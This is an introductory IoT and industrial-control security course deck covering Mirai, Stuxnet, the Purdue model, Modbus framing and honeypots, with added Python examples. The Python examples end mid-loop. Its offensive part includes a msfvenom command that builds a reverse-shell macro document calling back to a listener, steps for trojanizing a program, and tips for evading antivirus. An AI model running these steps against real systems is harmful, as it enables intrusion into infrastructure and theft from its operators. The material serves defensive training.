
IoT Security

Securing Internet of Things and Critical Infrastructure / Industrial Control Systems (ICS)

Aamir Lakhani
Twitter: @aamirlakhani
Aamir.Lakhani@
Course Goals and Objectives
• This is an introductory course to IoT and ICS cybersecurity.
• Learn the fundamentals of IoT cybersecurity systems and their components
• Learn about ICS/SCADA threats and the threat actors behind them
• Get an inside look at the most popular and successful attacks against IoT devices
• Review tools and techniques you can use to test and audit IoT devices across different industries
• Gain an understanding of the defensive frameworks used to protect IoT and critical infrastructure
• Explore tools you can implement in your environment to secure IoT systems
Why is this training important
• Millions of new IoT devices are deployed every year. IoT is becoming functional but is adding security risk.
• Malware targeting IoT devices is becoming more common and is having massive effects on the Internet and on cybersecurity.
• Most people don't understand how critical infrastructure functions.
What you will take with you
• Learn the fundamentals of IoT Cybersecurity systems and
their components
• Gain an understanding of theoretical defensive frameworks
used to protect IoT and critical infrastructure
• Explore tools you can use to implement in your environment
to secure IoT systems.
Who am I: About the Instructor
• Aamir Lakhani
• Red Team Researcher, Incident Response specialist, Digital Forensics specialist
• Twitter: @aamirlakhani Email: aamir.Lakhani@me.com
Part 1: Introduction to IoT
• Why IoT devices are extremely valuable to organizations
• The types of threats and vulnerabilities they introduce
• A look at recent attacks against IoT infrastructure
• Understanding the Internet of very vulnerable Things
• Introduction to basic critical infrastructure IoT devices
• Common components of systems
• Introduction to industrial control systems
• Introduction to SCADA
• Cybersecurity risks and concerns in IoT critical infrastructure
• OPSEC
• Deployment methodologies and segmentation concerns
Part 2: Cybersecurity and Critical Infrastructure
• IoT threat landscape and threat actors targeting systems
• Historic look at significant and modern threats
• Modern attacks against systems using pen testing tools
• Exploiting systems and gaining access
Part 3: IoT Honeypots
• Using IoT honeypots
• Using network segmentation services
• Auditing networks
Part 4: Putting it All Together
• Review of lessons
• Next steps
• Conclusion
Part 1: IoT Infrastructure
Introduction to IoT Infrastructure (1 hour)
POLL: What is your experience?
1. I am an expert on IoT and ICS cybersecurity
2. I have worked or am working on cybersecurity for IoT and ICS products
3. I have some idea of IoT and ICS cybersecurity, but this is my first real introduction to the topic
4. I have no idea about these types of technology and am here to be introduced to the topic
What are IoT Devices
• Thermostat
• Cars
• Smart Devices
• Smart Meters
• Mining Equipment
• Data Center Physical Access
• Equipment at airports
• Kiosks
• Light Bulbs
• AC / HVAC Systems
Internet of Things Devices
• There were around 400 million IoT devices with cellular connections at the end of 2016
• In 2018, IoT devices were expected to surpass mobile phones in number
• 70% of wide-area IoT devices will use cellular technology in 2022
Source: https://www.ericsson.com/en/mobility-report/internet-of-things-forecast
Mirai Botnet
• Turned IoT devices into "bots"
• Primarily targeted IP cameras, DVRs and home routers, logging in with factory-default credentials
• First discovered in August 2016
• Responsible for the October 2016 Dyn attack
• Named after the anime series Mirai Nikki
• Source code posted to Hack Forums
• Has inspired numerous other malware families and variants
Mirai Botnet (figure; source: Imperva)
Dyn Cyberattack (October 2016)
• The DDoS made many major websites unreachable for users across large parts of North America
• Large regions of Europe were also affected
• Most attack sources were IP cameras, DVRs, smart TVs, routers, and other consumer devices
• Dyn estimated that at one point more than 100,000 endpoints were attacking its servers
• The attack was reported to have generated up to 1.2 Tbps
IoT Denial of Service Threats
• The attacker deliberately tries to overload the capacity of the victim's system by sending data streams
• They don't need to steal or view data to be successful
• They slow down the business and make productivity difficult
• They prevent legitimate traffic and business from traversing networks
• They damage reputation
• Most IoT devices have network interfaces capable of generating lots of traffic, even when their CPUs are weak
Cryptomining
• Consumer IoT devices are becoming popular with attackers for mining cryptocurrency
• Not much processing power: one device might yield $0.20 - $0.90 per day
• Across thousands of devices those pennies add up quickly to dollars
• Over days and weeks this can mean a decent amount of money
• Some devices such as media players and TVs have 4K video processing hardware, but they are still far weaker miners than a desktop GPU; the attacker's edge is scale and the victim's electricity, not speed
Advanced Persistent Threats
• Attackers in a network will use IoT devices to hide a persistent connection into the network
• Attackers understand that if their intrusion is detected, PCs may be cleaned, but IoT devices are often not reset
• IoT devices are sometimes easier to exploit, and attackers use them as jumping-off points to discover and attack the rest of the network
Disruption
• Attackers will change settings on IoT devices
• Chemical plants could have safety measures turned off
• Thermostat temperatures may be set to hot
• Food manufacturing devices may have their mixing formulas altered
• Devices may cause a disruption in work
Surveillance / Recording
• IoT microphones and cameras used to record people
• Attackers may listen in on people and devices
• Attacks are seen on smartphones, baby monitors, smart switches
Why Do Organizations Use IoT Devices
• Security (cameras, door access readers, parking access)
• Automation (cleaning devices, lights, advertisement)
• Data center (cabinet access, kiosk access)
• Employees bring them in and use them
• Purchased without realizing they have smart features
Industrial IoT
• Smart robots in warehouses
• Factory floor vehicles
• Mining equipment
• Bottle and packaging tracking and fulfillment
• Rotators, mixers, balancers in chemical and medical manufacturing
• Self-driving cars, trains, and planes
What are common components?
• Limited or no operating system display
• User interaction limited to simple instructions, LCDs, or buttons
• ARM-based or similar low-powered processors
• Integrated networking (wireless or wired), normally COTS (commercial, off-the-shelf) networking hardware
• Sensors (motion, sound)
Common Operating Systems
• Contiki
• Android Things
• RIOT
• Apache Mynewt
• Huawei LiteOS
• TinyOS
• Windows IoT
• Raspbian
• Amazon FreeRTOS
Common features of these systems:
• IPv6 support
• Wireless support: WPA-PSK, 2.4 GHz; Bluetooth, Zigbee, NB-IoT, others
• Multitasking
• Written in C
• 1-10 KB kernel
• 40 KB - 2 MB memory requirements
• Java, Go, Dart, Python development support
Critical Infrastructure: What is Critical Infrastructure?
Critical Infrastructure
§ The Department of Homeland Security has identified 16 sectors of critical infrastructure
§ These sectors have some dependence on the Internet for operations, management, and automation
§ These are the systems that attackers target
https://www.dhs.gov/critical-infrastructure-sectors
Critical Infrastructure Sectors
§ Chemical Plants
§ Dams
§ Communication Infrastructure
§ Powerlines and Power Grids
§ Energy Sector
§ Financial Service Sector
§ Water and Wastewater
§ Food and Agriculture
ICS Hacking in the News (headlines)
Source: https://thehackernews.com/search/label/ICS%20Hacking
Source: https://www.cyberscoop.com/north-korea-ics-hacking-dhs-ics-cert/
Source: https://securityintelligence.com/news/critical-vulnerabilities-put-ics-security-at-risk/
Source: https://threatpost.com/attacking-ics-systems-like-hacking-in-the-1980s/104200/
Why Critical Infrastructure?
§ Has a reputation (rightly or wrongly) as an easy target
§ Visible, so attackers gain reputation
§ Ransom targets
§ Create distractions
§ Cyber warfare / attacks against the homeland
ICS Malware and Attack Surface
§ Over 114 advisories issued by ICS-CERT in 2018
§ ICS malware is very advanced:
» 2010 - Stuxnet
» 2013 - Havex
» 2015 - BlackEnergy 3 (used in the 2015 Ukraine grid attack)
» 2016 - CrashOverride / Industroyer
» 2017 / 2018 - Triton / Trisis
§ Analysis of the advisories shows the common weaknesses:
» Default or known usernames and passwords
» Configuration errors / software bugs
» Cross-site scripting
» Information leakage
Common attack vulnerabilities
§ Poorly configured firewalls and security systems
§ Peer Utility Links
§ Database Links
§ Dial-up access or secondary network management connections
§ VPNs
§ Man-in-the-Middle attacks
§ Phishing
Critical Infrastructure: Critical Infrastructure Hacking Tools
How ICS Hacking works
Common attack tools
§ SCADA Bones
§ Metasploit
§ Agora Pack
§ Immunity Canvas
§ Custom tools
Scanning and Vulnerability Testing?? (image: screen capture from the movie "Me, Myself, and Irene")
Attack Groups
§ Covellite
» Spear-phishing campaigns targeting US ICS
§ Dymalloy
» Attacks in the US, Canada, Europe, Turkey
§ Electrum
» 2016 Ukraine power grid attack
» Creators of CrashOverride
» Linked to the Sandworm APT
Dark Web Market Place (figure)
Skill Squatting – How It Works
• Criminals publish a skill with a sound-alike "name"
• The user says "Alexa, open <skill name>"
• The user unknowingly enables the criminals' skill instead of the one they meant
Voice AI Source Code – Darknet Chatter (figure: listings titled "Looking for Offers", "Workflow Automation", "Digital Assistant")
Drones – Bank Roof Top (figure: rogue drones; Credit Suisse; acid drops into data center)
Drones – Darknet Listing (figure: NFZ bypass for Yuneec drones, $50)
ICS Leaked Credentials (figure)
Shodan
• Search engine for the Internet of Things
• Finds open ports and services
• Allows attackers to find exposed systems
• Attackers have found power grids, critical infrastructure, and other services exposed
• Lots of open cameras, routers, servers
AutoSploit
• Finds systems with Shodan
• Finds exploits with Metasploit
• Allows massive, indiscriminate attacks
ICS Reconnaissance for an attack (sample attack; figure)
Critical Infrastructure: Defending Critical Infrastructure
Why are ICS systems difficult to protect
• Newer systems are designed with security and flexibility in mind
• However, many older systems remain in service because of the cost to replace them
• Government mandates and regulation help speed up adoption of new systems
• Older systems work
• Fear that things will stop working
• The expertise is no longer around or is no longer understood
• "If it isn't broke, don't fix it"
• Systems are sensitive to security tooling: a vulnerability scan or an inline device can crash a fragile controller
• Laughable defenses
• Systems are sensitive to delays and routing changes because of protocols such as multicast
• "We haven't been hacked; we are not a target"
Signatures?
• Static signature: digital hash, unique identifier, "WormChecksum"
• Code emulation: known packers, unknown packers, debuggers
• Behavioral: patterns, malicious behaviors, smart signatures
• Virtual execution: OS-level virtualization, sandbox / container, dynamic analysis
• Machine learning: machine deep analysis, neural networks, training sets
Machine learning example: training set of 20 malware files and 80 clean files
Feature: a startup registry entry, for example
C:\windows\start menu\programs\startup
* [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
Startup="C:\windows\start menu\programs\startup"
* [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders]
Startup="C:\windows\start menu\programs\startup"
* [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\User Shell Folders]
"Common Startup"="C:\windows\start menu\programs\startup"
* [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Shell Folders]
"Common Startup"="C:\windows\start menu\programs\startup"
Question: if a file contains a startup registry key, what is the likelihood that the file is malicious? In this example set, 80% (of the files carrying that feature, 80% are in the 20 malicious files).
Other features that make files malicious (example)
Feature, and the likelihood in the example set that a file exhibiting it is malicious:
Startup registry entries: 80%
Long sleep timers: 50%
Windows Scheduled Tasks / AT commands: 60%
Spawn new processes: 80%
Delete shadow copies: 90%
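The two slides above give per-feature figures but not how to combine them. The following added example (it is not from the slides and not vendor code) computes the single-feature likelihood from a constructed training corpus of 20 malicious and 80 clean files, then combines several features with a Laplace-smoothed naive Bayes model. The per-feature counts are assumptions chosen so that the startup-registry figure reproduces the slide's 80%; the analysis report format, the sleep threshold and the sample report are also constructed for illustration.

```python
"""Scoring a file as malicious from static and behavioural features.

Added example for this course page. The counts are constructed: 16 of 20
malicious and 4 of 80 clean files carry a startup registry entry, so
P(malicious | startup entry) = 16/20 = 0.80, the figure on the slide. The
other rows are assumptions for illustration only.
"""
from math import exp, log

N_MALICIOUS = 20
N_CLEAN = 80

# feature -> (malicious samples showing it, clean samples showing it)
FEATURE_COUNTS = {
    "startup_registry_entry": (16, 4),
    "long_sleep_timer": (10, 10),
    "scheduled_task_or_at": (12, 8),
    "spawns_new_process": (16, 4),
    "deletes_shadow_copies": (18, 2),
}

# Real Windows registry keys from the slide; a write under any of these
# with a "Startup" value is treated as a startup persistence entry.
STARTUP_KEYS = (
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders",
)

# Constructed analysis report for one sample (not a real file).
SAMPLE_REPORT = {
    "registry_writes": [
        r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup",
    ],
    "max_sleep_ms": 600_000,
    "commands": ["vssadmin delete shadows /all /quiet"],
    "child_processes": ["cmd.exe"],
}


def single_feature_probability(feature):
    """P(malicious | feature present), read straight off the counts.

    This is the number the slide quotes; note it is not the base rate (20%)
    but the malicious share among files that show the feature.
    """
    mal, clean = FEATURE_COUNTS[feature]
    return mal / (mal + clean)


def naive_bayes_probability(present, alpha=1.0):
    """Combine all known features with naive Bayes in log-odds form.

    Starts from the class prior (20 vs 80), then for each feature multiplies
    in P(present|class) or P(absent|class), Laplace-smoothed by `alpha`.
    Features are assumed conditionally independent, which is the usual
    (and knowingly wrong) simplification.
    """
    log_odds = log(N_MALICIOUS / N_CLEAN)
    for feature, (mal, clean) in FEATURE_COUNTS.items():
        p_mal = (mal + alpha) / (N_MALICIOUS + 2 * alpha)
        p_clean = (clean + alpha) / (N_CLEAN + 2 * alpha)
        if feature in present:
            log_odds += log(p_mal / p_clean)
        else:
            log_odds += log((1 - p_mal) / (1 - p_clean))
    return 1.0 / (1.0 + exp(-log_odds))


def extract_features(report):
    """Map a constructed analysis report to the feature names above."""
    feats = set()
    writes = [w.lower() for w in report.get("registry_writes", [])]
    if any(w.startswith(k.lower()) for w in writes for k in STARTUP_KEYS):
        feats.add("startup_registry_entry")
    if report.get("max_sleep_ms", 0) >= 5 * 60 * 1000:  # assumed: 5 minutes or more
        feats.add("long_sleep_timer")
    cmds = [c.lower() for c in report.get("commands", [])]
    if any(c.startswith(("schtasks", "at ")) for c in cmds):
        feats.add("scheduled_task_or_at")
    if report.get("child_processes"):
        feats.add("spawns_new_process")
    if any("vssadmin" in c and "delete shadows" in c for c in cmds):
        feats.add("deletes_shadow_copies")
    return feats


def score_report(report):
    """Convenience: features found and the combined probability."""
    feats = extract_features(report)
    return feats, naive_bayes_probability(feats)


if __name__ == "__main__":
    print("P(mal | startup entry) =", single_feature_probability("startup_registry_entry"))
    print("sample report:", score_report(SAMPLE_REPORT))
```

The point of the combined score is that a feature like "spawns new processes" is weak evidence on its own (plenty of clean software does it), while several weak features together move the posterior decisively; the smoothing keeps a feature never seen in clean files from producing an infinite log-odds.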

What can you do to protect your systems
• Internal segmentation
  • Organizations that implement internal segmentation firewalls greatly reduce their risk and attack surface
  • Attackers will pick an easier target
• Dedicated ICS protection
  • OEMs that have cyber researchers and teams dedicated to finding and combating ICS and related threats
  • Specialized products and licenses for these types of protection
• Good cyber hygiene
  • Attackers use a variety of attacks such as phishing and drive-by downloads
Part 2: IoT Infrastructure
Cybersecurity and Critical Infrastructure
POLL: Do you work in OT?
1. I work primarily in OT security
2. I work in both OT and IT cybersecurity, primarily in OT
3. I work in both OT and IT cybersecurity, primarily in IT
4. I work primarily in IT cybersecurity
5. I don't work in either IT or OT cybersecurity
6. What is OT?
Critical Infrastructure: Purdue Model
Purdue Model
• Reference model used in critical infrastructure (the Purdue Enterprise Reference Architecture)
• Based on 5 levels (level 0 - 4); many descriptions add a Level 5 for the enterprise network
• Level 0: Physical process: sensors, actuators, and the equipment itself
• Level 1: Basic control: PLCs and RTUs that read the sensors and drive the actuators
• Level 2: Supervisory control: HMIs (human-machine interfaces), SCADA servers, engineering workstations
• Level 3: Site operations: manufacturing execution, historians, lab equipment, operations management
• Level 4: Business: scheduling, shipping, inventory, ERP, timecards, company intranet, company social media
https://en.wikipedia.org/wiki/Purdue_Enterprise_Reference_Architecture
Purdue Model (figure)
https://en.wikipedia.org/wiki/Purdue_Enterprise_Reference_Architecture
Critical Infrastructure: ICS Basic Components
Basic SCADA Diagram (figure)
Physical process -> Sensors -> PLC / RTU -> HMI -> Monitoring workstation, Management and Logging workstation
What is SCADA
• Supervisory Control and Data Acquisition: the systems that collect readings from field sensors and let operators supervise and command the process
• Sensors communicate operation, operation mode, downtime
• Is a drill spinning? Is the water hot? Is the trash bin full? Does the filter need to be changed?
• Almost all modern industries use SCADA
• SCADA systems communicate in different ways
• Some use serial communications; others, such as Modbus TCP, use IP communications
Modbus
• A communications protocol created by Modicon (now Schneider Electric) and maintained today by the Modbus Organization
• Multiple versions, including serial (RTU, ASCII) and IP-based (Modbus TCP)
• Royalty-free and the de facto standard supported by most PLCs
• Modbus TCP runs over TCP port 502 (Modbus RTU framing can also be tunnelled over TCP)
• No authentication or encryption in the protocol: anything that can reach port 502 can read and write registers
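To make the framing concrete, here is an added example (not from the slides and not vendor code) that builds a Modbus/TCP Read Holding Registers request, parses the reply including the exception form, and, for lab use, sends the request to a live device. The sample frames in the test are constructed by hand; a Modbus/TCP server on port 502 and the register values are assumptions.

```python
"""Modbus/TCP framing: build a Read Holding Registers request, parse the reply.

Added example for this course page; not vendor code and not from the slides.
It assumes a Modbus/TCP server on TCP port 502; the sample frames used to
exercise it are constructed by hand.
"""
import socket
import struct

MODBUS_TCP_PORT = 502
FC_READ_HOLDING_REGISTERS = 0x03

# Exception codes from the Modbus Application Protocol specification
EXCEPTION_NAMES = {
    0x01: "ILLEGAL FUNCTION",
    0x02: "ILLEGAL DATA ADDRESS",
    0x03: "ILLEGAL DATA VALUE",
    0x04: "SERVER DEVICE FAILURE",
}


def build_read_holding_registers(transaction_id, unit_id, start_addr, count):
    """Return a Modbus/TCP ADU: 7-byte MBAP header followed by the PDU.

    MBAP = transaction id (2 bytes), protocol id (2, always 0), length (2),
    unit id (1). The length field counts the unit id plus the PDU.
    """
    if not 1 <= count <= 125:
        raise ValueError("FC 0x03 allows 1..125 registers per request")
    pdu = struct.pack(">BHH", FC_READ_HOLDING_REGISTERS, start_addr, count)
    mbap = struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, unit_id)
    return mbap + pdu


def parse_response(frame):
    """Parse a Modbus/TCP response ADU into a dict.

    Handles normal FC 0x03 replies and exception replies (function code with
    the high bit set, followed by a one-byte exception code). Raises
    ValueError when the MBAP length field disagrees with the frame, which is
    the check a client needs because Modbus/TCP has no other framing.
    """
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header plus function code")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError("unexpected protocol id %d" % proto)
    if length != len(frame) - 6:
        raise ValueError("MBAP length field does not match frame size")
    fc = frame[7]
    result = {"transaction_id": tid, "unit_id": unit, "function": fc & 0x7F}
    if fc & 0x80:  # exception response
        code = frame[8]
        result["exception"] = code
        result["exception_name"] = EXCEPTION_NAMES.get(code, "UNKNOWN")
        return result
    if fc == FC_READ_HOLDING_REGISTERS:
        byte_count = frame[8]
        data = frame[9:9 + byte_count]
        if len(data) != byte_count or byte_count % 2:
            raise ValueError("bad byte count in FC 0x03 response")
        result["registers"] = list(struct.unpack(">%dH" % (byte_count // 2), data))
    return result


def read_holding_registers(host, unit_id, start_addr, count,
                           port=MODBUS_TCP_PORT, timeout=3.0):
    """Send one FC 0x03 request to a live device and return the parsed reply.

    Not exercised offline; included so the framing above can be tried
    against a lab PLC or simulator. Reads the MBAP header first, then
    exactly the number of bytes the length field announces.
    """
    request = build_read_holding_registers(1, unit_id, start_addr, count)
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        header = s.recv(6)
        if len(header) < 6:
            raise ConnectionError("short MBAP header")
        remaining = struct.unpack(">H", header[4:6])[0]
        body = b""
        while len(body) < remaining:
            chunk = s.recv(remaining - len(body))
            if not chunk:
                raise ConnectionError("connection closed mid-frame")
            body += chunk
    return parse_response(header + body)


if __name__ == "__main__":
    print(build_read_holding_registers(1, 1, 0, 2).hex())
```

Because there is no authentication, the same twelve-byte request works against any reachable device; that is why port 502 exposed to an untrusted network is a finding on its own, before any vulnerability is involved.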
Basic SCADA Diagram with Purdue levels (figure)
Physical process (Level 0) -> Sensors (Level 0/1) -> PLC / RTU (Level 1) -> HMI (Level 2) -> Monitoring workstation (Level 3) -> Management and Logging workstation (Level 4)
Critical Infrastructure: ICS Attacks
Stuxnet
• Discovered in 2010; in development since at least 2005
• Believed to have caused major damage to the Iranian nuclear program
• Believed to have been co-developed by the US and Israeli governments
• Targeted Siemens PLCs. Used 4 Windows zero-days to spread and gain control
• Infected "air gapped" environments via USB sticks
• Manipulated centrifuge rotor speeds (and, in an earlier variant, cascade pressure through the valves) while replaying normal readings to the operators
• Widely called the first cyber weapon
• The first weapon made up entirely of code
What happened
• Uranium-235 separation is critically dependent on the rotation speed of the centrifuges
• High speed is helpful, but causes the equipment to shake
• Shaking can cause major failures to occur
Shaking (video): https://www.youtube.com/watch?v=LV_UuzEznHs
What happened (continued)
• The malware modified the PLC code controlling the centrifuges
• The malware was kinetic, meaning it caused physical damage
• Destroyed physical machinery is much harder to recover from than corrupted software
Ukrainian Power Attacks (2015, 2016)
• Roughly 230,000 customers lost electricity in December 2015, and a Kiev transmission substation was taken offline in December 2016
• Malware (BlackEnergy, KillDisk), phishing, remote control of operator HMIs, destructive wipes, and a telephone denial of service against the call centres were all used against the power companies
• SCADA systems running over IP were targeted, along with operator workstations running Windows software
CrashOverride Attack (December 2016, analyzed in 2017)
• The malware was named "CrashOverride" (also "Industroyer")
• The attack cut power to about one fifth of Kiev's consumption for around an hour
• Disrupted the signalling infrastructure so that operators could not communicate with, or send commands to, the substation
• It was able to send its own commands, speaking native grid protocols (IEC 101, IEC 104, IEC 61850, OPC DA)
• Can manipulate circuit breakers into open or closed states
• Potentially taking down substations and leaving them offline
• Extremely modular; can be adapted to multiple systems
POLL: Have you used Metasploit
1. Yes
2. No
3. Maybe, I am not sure
Critical Infrastructure: ICS Hacking Tools, Techniques, Threat Actors
SILENTTRINITY
• SILENTTRINITY is a post-exploitation command and control (C2) framework written in Python 3, with implants built on .NET scripting languages (IronPython, Boo)
• It creates "listeners" on which the attacker waits for a victim implant to connect
• When a victim connects, the attacker can control the PC
• The attacker can dump passwords
• Control the webcam
• Infect the system with ransomware
SILENTTRINITY Main Menu (screenshot)
SILENTTRINITY Modules (screenshot)
How do these attacks get on systems?
• Phishing emails claiming to carry legitimate programs or updates
• Convincing contractors or other people to infect or "update" systems
• Infecting legitimate programs with malicious updates
Infecting a legitimate program
• Get an executable or similar that is known safe (we will use notepad.exe)
• Make sure your command and control server is reachable from the victim, either over the Internet or by IP address
• Multiple tools are available; we will use Metasploit for demonstration purposes
Metasploit (screenshot)
AV Evasion
• Multiple frameworks are available to avoid AV detection
• Do not upload to VirusTotal to test: samples are shared with the AV vendors, so the payload gets signatures quickly
• NoDistribute is a better site ($3 - $13 per month)
• Real attackers will use their own systems and virus scanners
• They will update the scanners, then disconnect them from the Internet
Throwing Star LAN Tap
• Insert the Throwing Star LAN Tap (J1 and J2) in line with the target network to be monitored
• Use Ethernet cables to connect one or both of the monitoring ports (J3 and J4) to ports on one or two monitoring stations. Each port monitors traffic in one direction only
• Use your favorite software (e.g., tcpdump or Wireshark) on the monitoring station(s) to capture network traffic
• The Throwing Star LAN Tap is a passive Ethernet tap, requiring no power for operation; it only works at 10/100 Mbps, as the design intentionally drops gigabit link negotiation
Ubertooth One
• Scan and intercept Bluetooth signals
• Capture and replay Bluetooth packets
• Multiple projects on GitHub that attack Bluetooth devices
HackRF One
• Transmits and receives radio signals from 1 MHz to 6 GHz (half-duplex software defined radio)
• Sniff, transmit, and replay radio signals
• Unlocking cars, garage doors and security gates whose remotes use a fixed code; rolling-code remotes defeat a plain replay
• View public service transmissions
• View pager transmissions
MITRE ATT&CK
• MITRE ATT&CK is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.
Leafminer
• Iran-based threat group
• Attacks businesses and organizations in the Middle East
• Has attempted to disrupt oil and gas production and distribution
Leafminer on MITRE ATT&CK (screenshot)
OilRig
• They use the basic techniques we have already discussed
• Attacks are not sophisticated, but they are extremely persistent
• They take many open-source tools and rebrand them
• They have used DNS hijacking attacks
OilRig on MITRE ATT&CK (screenshot)
Hexane
• Targeting oil and gas companies and infrastructure in the Middle East
• Drops malicious documents carrying scripts through phishing attacks
• They have targeted supply chains and third parties to gain access into systems
How to weaponize a document
root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=8080 -e x86/shikata_ga_nai -f vba-exe
Creates a weaponized Word document: the output is VBA macro code, with the payload embedded, to paste into a Word macro
• The user must enable macros for it to work
Social Engineering Attacks
SET – Social-Engineer Toolkit
• The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly.
• Simulate the attacks we discussed
• Test phishing attacks, site cloning, email spam
Summary of Lesson
• Attacks against IoT and ICS environments are not complicated
• Most use known methods such as phishing
• However, some attacks, probably created by governments, are extremely complex and sophisticated
• Threat actors know they can disrupt processes, manufacturing, distribution
Part 3: Securing IoT
Introduction to IoT Infrastructure (1 hour)
Critical Infrastructure: Segmentation
POLL: What is your experience?
1. We currently do advanced segmentation based on application policies. This includes things like NAC and 802.1X deployments
2. We have VLAN (layer-2) segmentation via routers and firewalls (layer-3)
3. We use application and user-based trust tokens for data access and don't need segmentation
4. We have a flat network
Segmentation
• Identifying critical resource segments
• Segmenting from a network perspective for management
• Segmenting from a policy and access perspective
• Segmenting from an access and monitoring perspective
Note:
• The following two slides are used by permission from a vendor
• This course is not endorsing or recommending a vendor
Fortinet's Intent Based Segmentation (figures)
• Source: Fortinet, used by permission: https://docs.fortinet.com/document/fortigate/6.0.0/cookbook/724439/fortinet-security-fabric-installation
POLL: Have you heard of deception technologies?
1. I know exactly what it is and have used it
2. I know what it is and might have played with it
3. I have heard of it, and not much else
4. Never heard of it
Critical Infrastructure: Honeypots
Honeypots
• A honeypot is a computer system set up to act as a decoy to lure cyberattackers, and to detect, deflect or study attempts to gain unauthorized access to information systems.
• Allows us to learn from attacker techniques and see new attacks in the wild
• High-interaction and low-interaction honeypots
Setting up Honeypots
• 2 public addresses
  • 1 for management
  • 1 for honeypot services
• No NAT
  • Some attacker activity is not recorded correctly behind NAT
• VPS services
  • Lots of attacks will cause the provider to terminate the service
• Honeypot compromises
  • Used to host malware
  • Illegal content
Log Management (figure)
Source: https://www.threatstream.com
Source: https://www.anomali.com
Snort
• Used with honeypots to capture signature-based threat data
• Used to capture PCAPs
• There are better ways to do this
Other fun stuff
• Open "listen" ports for major malware attacks
• Mimic the ports of major (IoT) devices and keep logs and PCAPs
• Create Windows systems fed by a malware URL feed
• Browse the malware sites from a non-admin account
• If it gets compromised anyway, you might have found a zero day
• Open FTP server (or one that can be brute-forced easily)
Conpot
• "Conpot is a low interactive server side Industrial Control Systems honeypot designed to be easy to deploy, modify and extend. By providing a range of common industrial control protocols we created the basics to build your own system, capable to emulate complex infrastructures to convince an adversary that he just found a huge industrial complex."
• Emulates devices such as a Siemens S7-200 PLC or a Guardian AST tank monitor
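To show what "mimic the ports of major devices and keep logs" looks like at protocol level, here is an added example of a minimal low-interaction Modbus/TCP honeypot in the spirit of Conpot. It is not Conpot's code and not from the slides. It answers Read Holding Registers and Report Server ID with canned data so a scanner believes it found a PLC, rejects every other function with a Modbus exception, and writes one JSON line per request. The device identity string, register image, listen port and log path are all assumptions.

```python
"""Minimal low-interaction Modbus/TCP honeypot (added example, Conpot-style).

Not Conpot's code. Serves FC 0x03 (Read Holding Registers) and FC 0x11
(Report Server ID) from constructed data, answers everything else with a
Modbus exception, and logs each request as a JSON line. Device identity,
registers, port and log path are invented for the example.
"""
import json
import socket
import struct
import threading
from datetime import datetime, timezone

LISTEN_PORT = 502                  # real port needs root; use 5020 in a lab
FAKE_DEVICE_ID = b"Fake-PLC-2000 v1.0"          # constructed identity
FAKE_REGISTERS = [0x0000, 0x0BB8, 0x0010, 0x0001]  # constructed register image

EX_ILLEGAL_FUNCTION = 0x01
EX_ILLEGAL_DATA_ADDRESS = 0x02


def handle_request(raw, peer):
    """Return (log_record, response_bytes) for one Modbus/TCP request.

    Pure function: the socket loop only moves bytes in and out, so the
    protocol logic can be tested offline with hand-built frames.
    """
    record = {"ts": datetime.now(timezone.utc).isoformat(), "peer": peer, "raw": raw.hex()}
    if len(raw) < 8:
        record["verdict"] = "malformed"
        return record, b""
    tid, proto, length, unit = struct.unpack(">HHHB", raw[:7])
    fc = raw[7]
    record.update({"transaction_id": tid, "unit_id": unit, "function": fc})

    def reply(pdu):
        return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu

    if proto != 0 or length != len(raw) - 6:
        record["verdict"] = "bad_mbap"
        return record, b""
    if fc == 0x03 and len(raw) >= 12:
        start, count = struct.unpack(">HH", raw[8:12])
        record.update({"start": start, "count": count})
        if not 1 <= count <= 125 or start + count > len(FAKE_REGISTERS):
            record["verdict"] = "exception_illegal_address"
            return record, reply(bytes([fc | 0x80, EX_ILLEGAL_DATA_ADDRESS]))
        regs = FAKE_REGISTERS[start:start + count]
        record["verdict"] = "served_registers"
        return record, reply(bytes([fc, 2 * count]) + struct.pack(">%dH" % count, *regs))
    if fc == 0x11:
        # Report Server ID: byte count, server id string, run indicator (0xFF = running)
        body = FAKE_DEVICE_ID + b"\xff"
        record["verdict"] = "served_device_id"
        return record, reply(bytes([fc, len(body)]) + body)
    # Writes (0x05, 0x06, 0x10, ...) and unknown codes: refuse, but log them,
    # because a write attempt is the interesting signal on a honeypot.
    record["verdict"] = "exception_illegal_function"
    return record, reply(bytes([fc | 0x80, EX_ILLEGAL_FUNCTION]))


def serve(port=LISTEN_PORT, log_path="modbus-honeypot.jsonl"):
    """Accept connections and append one JSON record per request to log_path."""
    def client(conn, addr):
        peer = "%s:%d" % addr[:2]
        with conn, open(log_path, "a") as log:
            conn.settimeout(30)
            try:
                while True:
                    data = conn.recv(260)  # max Modbus/TCP ADU
                    if not data:
                        break
                    record, response = handle_request(data, peer)
                    log.write(json.dumps(record) + "\n")
                    log.flush()
                    if response:
                        conn.sendall(response)
            except (socket.timeout, ConnectionError):
                pass

    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen()
        while True:
            conn, addr = srv.accept()
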